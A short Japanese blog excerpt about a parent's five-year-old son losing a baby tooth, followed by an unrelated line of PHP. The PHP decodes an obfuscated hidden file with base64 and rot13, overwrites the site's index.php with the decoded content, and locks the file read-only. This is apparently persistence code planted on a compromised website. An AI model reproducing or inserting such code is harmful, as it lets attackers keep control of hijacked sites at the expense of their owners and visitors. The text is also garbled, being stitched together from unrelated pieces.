
乳歯が抜けた!
歯がぬけたー!!抜けました!先日、長男の下の乳歯が抜けました。なぜか本人も喜んでいて大騒ぎ。どうやら保育園では、乳歯が抜けた子は注目の的になるようでみんなに言わなきゃって張り切っています。長男は今5歳なんですが、園のクラスでは3番目くらい...
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }